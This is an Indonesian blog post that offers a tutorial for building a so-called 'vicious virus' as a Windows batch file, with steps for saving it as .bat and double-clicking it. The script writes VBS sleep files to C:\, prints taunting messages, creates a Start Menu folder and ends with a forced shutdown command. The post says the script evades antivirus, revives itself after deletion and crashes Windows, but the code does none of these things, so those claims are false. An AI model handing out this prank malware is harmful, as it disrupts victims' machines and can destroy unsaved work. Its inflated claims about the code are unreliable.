CARA MEMBUAT VIRUS GANAS versi 1,1



pada postingankali ini admin bakal ngasih tutorial CARA MEMBUAT VIRUS GANAS versi 1,1(inget masih versi 1,1 loh...!) tapi keganasan jangan ditanya bro virus ini dapat merusak system bawaan windows tanpa di curigai oleh anti virus,,  teteapi di beberapa antivirus yang menggunakan versi pro virus ini sedikit di curigai

kemapuan virus ini
-sulit dideteksi oleh antivirus
-apabila terdetaksi dan di hapus virus ini akan kembali hidup lagi(kekal)

gambar virus saat di save"klik untuk memperbesar"
-menyebar menggunakan comand. promp.
-mengobrak-abrik system bawaan windows (bhkan dapat meng crashnya)
-sulit di musnakan
-dapat memnyebabkan copm. sering error dan terpaksa harus  install ulang


oke langsung aja step bt step nya:
1.buka notepad
2.caopy dan pastekan code virus dibawah ini ke dalam notepad
3.simpan dengan nama jou_734_virus.bat
4.ubah ekstensial nya dari txt menjadi all file
5save deh....

NB: untuk mengaktifkan virus cukup klik2x (seperti membuka file)
jangan menyalah gunakan (dosa tanggung sendiri)


cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo I'M JOU VIRUS!!!
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo DENGAN SEGALA HORMAT VIRUS BOOTING DULU…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN WASSALUMUALAIKUM WR WB.”
Share this article :
 
Comments
0 Comments

Poskan Komentar

Biasakn untuk berkomentar, setiap komenntar akan saya tanggapi semampu saya

-jangan spam
-jangan menghina
-jangan pornografi

trims..

Welcome! close
 
Support : Zathuragen Blog | JOU Tamplate | Blog tamplate
Copyright © 2011. Zathuragen Blog - All Rights Reserved
Template Created by Creating Website Published by JOU Template
Proudly powered by Blogger-Indonesia
Minal aidzin walfaizin, mohon maaf lahir dan batin....
ans!!